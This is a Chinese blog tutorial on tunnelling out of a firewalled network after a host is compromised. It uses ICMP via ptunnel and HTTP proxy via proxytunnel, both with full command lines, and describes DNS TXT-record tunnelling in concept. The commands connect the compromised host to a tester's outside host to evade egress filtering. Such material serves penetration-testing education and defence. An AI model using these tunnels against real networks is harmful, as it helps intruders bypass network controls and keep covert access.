绕过边界防火墙之ICMP隧道、HTTP隧道、UDP隧道

 

一、ICMP隧道


背景:已经通过某种手段拿到了园区网A主机的控制权,但是边界防火墙只放行该主机向外的ICMP流量,此时怎样才能让A主机和公网主机C建立TCP连接呢?

方案:将TCP包内容包裹在ICMP中进行传递

工具: ptunnel

工作原理:A主机通过周期性向渗透测试工程师发送ICMP请求以建立ICMP连接。在本地侦听一个空闲端口并与指定IP的指定端口(C主机)建立映射。此时访问侦听的这个端口就相当于访问公网指定IP的指定端口了(C主机)

 


 

 

隧道建立命令:

渗透测试工程师端(开启这个程序后本地不会侦听任何端口,因为它用的是ICMP,既不属于TCP也不属于UDP):
ptunnel -x passwd

参数说明:
-x:密码


A主机端:
ptunnel -p 120.1.1.1 -lp 8000 -da 180.1.1.1 -dp 80 -x passwd

参数说明:
-p:渗透测试工程师IP地址
-lp:本地侦听端口
-da:C主机
-dp:C主机端口
-x:密码

 

验证:此时在A主机将侦听8000端口,A、B主机此时连接A主机8000端口的TCP流量均被导入C主机的80端口

 


缺点:唯一的缺点是运行此程序需要root权限

 

提醒:如果觉得每个隧道只能映射一个公网地址有局限性,可以配合SSH动态端口使用。通过此方法建立ICMP隧道后,再在此隧道内建立一条SSH动态端口转发隧道就可以访问公网任意地址了

 

 

 

 

 

二、http隧道

背景:已经通过某种手段拿到了园区网内A主机的控制权,但是边界防火墙只放行代理服务器的出向流量,可是又想用A主机与外面的PC建立ssh连接时该怎么办?

方案:让http代理服务器代替A主机与PC建立ssh连接

工作原理:在本地侦听一个空闲端口,并将PC的22端口映射至该侦听端口,然后将通往PC22端口的流量包裹进代理服务器的http包中,代理服务器将代替A主机与PC建立ssh连接,然后将回包通过http反还给A主机。此时园区网内所有设备只要sshA主机侦听的端口,流量就会被导入PC的22端口。(另外该方案还支持代理链,即通过代理服务器连接至外网的某一代理服务器,再通过该代理服务器与PC建立ssh连接)

 

隧道建立命令:proxytunnel -a 2222 -p 10.1.1.1:3128 -r 180.1.1.1:80 -d 120.1.1.1:22

-a:本地侦听端口
-p: 本地官方的代理服务器
-r: 墙外的代理服务器
-d: 最终要访问的目标

验证:A主机将在0.0.0.0侦听2222端口,此时园区网内任意一主机ssh主机A的2222端口都将连到PC的22端口

 

 

 

 

 

 

三、UDP隧道

背景:通过某种手段拿到了园区网A主机的控制权,却发现边界防火墙只放行向外的DNS请求流量,此时想要ssh公网上的B主机该怎么办?

方案:将ssh流量包裹在DNS请求报文中

工作原理:搭建一个DNS服务器(B主机),申请域名,并确保上级DNS服务器能将该域名解析至自己的DNS服务器。A主机向公网发出DNS请求(因为A记录长度有限,故可以请求txt这种记录,请求的txt内容就为ssh流量),经过根DNS将流量解析至自己的DNS服务器(B主机),这样公网的主机B就收到了A主机发来的ssh协商请求,然后B主机通过将协商内容写入DNS应答包返回给主机A,这样一来一回就达成了建立ssh连接的网络环境。

 

由于这种隧道搭建需要一定成本(要让根DNS解析至自己主机),所以就没有做实验验证了。

需要提醒一点:大家都知道DNS会用到UDP的53端口和TCP的53端口,但需要注意的是UDP的53端口是用来做DNS查询使用,TCP的53端口是用用于同一区域冗余DNS之间同步信息,并非这俩端口都是用来做DNS查询的,所以网络管理员一般在边界防火墙只需放开UDP的53端口即可。

 

 


总结:归根结底,每种隧道的实现其实都是将协商数据封装至可以放行的流量中。(即:防火墙放行什么协议就将隧道协商流量封装至什么协议)

posted @ 2019-02-01 16:51  白桦林_HK  阅读(3303)  评论(0编辑  收藏  举报